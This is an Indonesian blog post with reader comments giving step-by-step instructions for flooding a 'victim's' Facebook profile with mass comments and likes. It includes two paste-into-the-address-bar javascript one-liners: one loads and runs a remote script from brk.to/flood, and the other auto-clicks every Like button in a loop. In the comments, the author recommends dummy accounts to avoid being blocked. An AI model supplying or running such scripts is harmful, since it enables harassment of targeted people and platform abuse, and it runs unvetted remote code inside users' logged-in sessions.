23 Juli 2011

Cara NgeBom Komentar & Like Facebook

Ini ada Trik Facebook lagi yang saya berikan untuk sahabat setia Blog's teguh.. tanpa basa basi lagi ikuti tata aranya di bawah..

Cara Ngebom komentar Facebook

  • Yang pertama Login dulu ke Account Facebook anda
  • Lalu buka Profil Korban yang ingin di bom Facebooknya
  • Lalu Copy Script di bawah

javascript:(a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0);

  • Lalu Pastekan di adrees bar Profil Teman anda --> Tekan ENTER
  • Lalu Masukan jumlah Komentar yang di inginkan
  • Masukan Komentarnya --> Tekan ENTER
  • Tunggu Beberapa saat dan liha hasilnya
  • Jika belum kelihatan Efeknya Refresh Browser anda


Cara Ngebom Like Facebook
  • Kali ini caranya agak simpel kalian hanya tinggal Masuk ke Profil Korban anda
  • lalu Copy Script di bawah lalu pastekan di adrees bar Profil korban anda


javascript:var i=0;ex=0;s=0;function EXP_ALL(){ExpandComm = document.getElementsByTagName("input");for(e = 0; e < ExpandComm.length; e++){myClass = ExpandComm[e].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(ExpandComm[e].getAttribute("name") == "view_all")ExpandComm[e].click()}}function JEMPOLERS(){jempol = document.getElementsByTagName("button");for(j = 0; j < jempol.length; j++){myClass = jempol[j].getAttribute("class");if(myClass != null && myClass.indexOf("like_link") >= 0)if(jempol[j].getAttribute("name") == "like")jempol[j].click()};}function JEMPOLERC(){buttons = document.getElementsByTagName("button");for(x = 0; x < buttons.length; x++){myClass = buttons[x].getAttribute("class");if(myClass != null && myClass.indexOf("stat_elem") >= 0)if(buttons[x].getAttribute("title") == "Like this comment")buttons[x].click()};}function updateTime(){ex=ex+1;i=i+1;s=s+1;if (ex==5){EXP_ALL();ex=0};if (s==5){ex=0;JEMPOLERS();s=0};if (i==2){JEMPOLERC();i=0;}}alert('-==[FB STATUS & COMMENTS LIKE GENERATOR]==-\n\nScript by -Dicyber-');updateTime();window.setInterval(updateTime, 1000);void(0)

  • Dan Lihat hasilnya..


NOTICE : Saya tidak bertanggung jawab Akibat yang di timbulkan Trick Ini

7 Comment:

  1. wah ane udah 3 kali di blokir gara2 pake like boomber gan.. kwoakwoako

    BalasHapus
  2. @TituitBom : hhehehe.. saya saranin pake Fb Dummy aja untuk melakukan trick ini..

    BalasHapus
  3. maksudnya .... :a1
    gak ngerti nanti fb siapa yg ke blockir

    BalasHapus
  4. gan ane mau nanyak nii adress bar tman apa maksudnya gan

    tolong perjelasannya..??

    :k6

    BalasHapus
  5. @Boy's Generations -> sya hanya ngingetin klo make trik ini saya nggak bertanggung jwb klo facebook kamu di blokir

    @Novry -> Fb dummy = Fb baru

    @Arifnst -> adress bar = t4 tulisan http://blalalalala.com/... di atas t4 nya

    BalasHapus
  6. adress bar yg di mn ih

    BalasHapus

Bebas dan Sopan